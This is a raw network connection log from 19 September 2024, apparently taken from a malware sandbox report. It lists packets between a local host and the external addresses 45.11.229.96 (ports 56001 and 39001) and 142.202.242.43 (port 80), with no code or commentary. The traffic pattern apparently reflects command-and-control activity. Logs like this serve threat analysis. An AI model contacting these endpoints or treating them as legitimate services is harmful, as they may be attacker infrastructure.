Sep 19, 2024 02:41:47.992907047 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.992990971 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993041039 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993065119 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993133068 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993133068 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993217945 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993267059 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993289948 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993350029 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993354082 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993469954 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993486881 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993510008 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993623018 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993719101 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993722916 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993822098 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993832111 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993885994 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993886948 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.993904114 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.993921041 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:47.994044065 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:47.994107962 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.021162987 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:48.137670040 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163357973 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163530111 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163549900 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163566113 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163583040 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163600922 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163645983 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163674116 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163691998 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163691998 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163741112 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163741112 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163815975 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.163840055 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.163955927 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.164004087 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.164088964 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.164109945 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.164186001 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.164359093 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.164542913 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.164657116 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.164685011 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.164980888 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165036917 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165055037 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165179014 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.165224075 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165271044 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165307999 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.165451050 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.165463924 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165514946 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165563107 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165735960 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165750027 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.165872097 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.165879965 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.166467905 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166521072 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166635036 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.166682005 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166743040 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166762114 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166856050 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.166923046 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166946888 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.166975975 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.166996002 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167220116 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.167292118 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167440891 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.167484999 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167526960 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167609930 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167665005 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167720079 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167752028 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.167872906 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.167907953 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.167970896 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168037891 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.168224096 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168273926 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168304920 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168363094 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.168453932 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.168596029 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168648005 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168730021 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.168804884 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.168926954 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.169105053 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.169575930 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.169625998 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.169832945 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.170965910 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:48.171171904 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:48.171282053 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:48.182029009 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.320894957 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:48.322782040 CEST	80	49845	142.202.242.43	192.168.11.30
Sep 19, 2024 02:41:48.338849068 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.338871956 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.338898897 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339082956 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.339087009 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339263916 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.339327097 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339365959 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339390039 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339412928 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339564085 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339617968 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339627981 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.339652061 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339674950 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339736938 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339766026 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339783907 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.339791059 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339816093 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339950085 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339973927 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.339977980 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340042114 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340069056 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340082884 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340117931 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340221882 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340280056 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340339899 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340342045 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340508938 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340511084 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340563059 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340581894 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340667963 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340684891 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340734005 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.340809107 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340830088 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340903997 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.340958118 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.341069937 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.341119051 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.341624975 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.341826916 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.341916084 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.342957973 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.342999935 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343190908 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.343230963 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343317032 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343338013 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343358994 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343379974 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343436956 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.343442917 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343493938 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343607903 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343622923 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.343628883 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343723059 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.343756914 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343775034 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.343810081 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.343911886 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344007969 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.344031096 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344083071 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344207048 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344216108 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.344228983 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344279051 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344408035 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344458103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344480038 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344489098 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.344547987 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.344645023 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.344748974 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.345280886 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.345490932 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.345737934 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.369517088 CEST	49845	80	192.168.11.30	142.202.242.43
Sep 19, 2024 02:41:48.389374971 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.390398026 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.495151043 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.514164925 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.514193058 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.514216900 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.514431953 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.514744997 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.514870882 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.514898062 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515038967 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515060902 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515116930 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515182018 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515233040 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515274048 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515350103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515402079 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515424013 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515471935 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515533924 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515584946 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515604019 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515734911 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515759945 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515783072 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515907049 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515928984 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.515963078 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.515980005 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516033888 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516055107 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516102076 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516160011 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516195059 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516232014 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516284943 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516314030 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516365051 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516365051 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516410112 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516515970 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516520977 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516644001 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516664982 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516724110 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.516730070 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516794920 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.516854048 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.517069101 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.517122984 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.518524885 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.518644094 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.519006014 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519365072 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519417048 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519655943 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.519736052 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519787073 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519854069 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519907951 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.519968033 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520018101 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520246029 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520365953 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520409107 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520417929 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520477057 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520591021 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520601988 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520667076 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520688057 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520730019 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520812035 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520862103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.520875931 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.520916939 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521009922 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521073103 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.521116018 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521239996 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521241903 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.521286964 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521342039 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521394968 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521423101 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.521480083 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521578074 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.521620989 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521697044 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.521727085 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.521956921 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.565311909 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.565426111 CEST	39001	49844	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.565586090 CEST	49844	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.670389891 CEST	39001	49846	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.670588017 CEST	49846	39001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.689418077 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689470053 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689595938 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689660072 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.689737082 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689837933 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689857960 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.689889908 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689912081 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.689961910 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690088034 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.690090895 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690207958 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690347910 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690361023 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.690496922 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690521002 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690577984 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690620899 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.690630913 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690756083 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690777063 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.690831900 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690885067 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.690907001 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.690962076 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691018105 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691040993 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691081047 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691128016 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.691133022 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691157103 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691193104 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.691199064 CEST	56001	49839	45.11.229.96	192.168.11.30
Sep 19, 2024 02:41:48.691271067 CEST	49839	56001	192.168.11.30	45.11.229.96
Sep 19, 2024 02:41:48.691339016 CEST	49839	56001	192.168.11.30	45.11.229.96
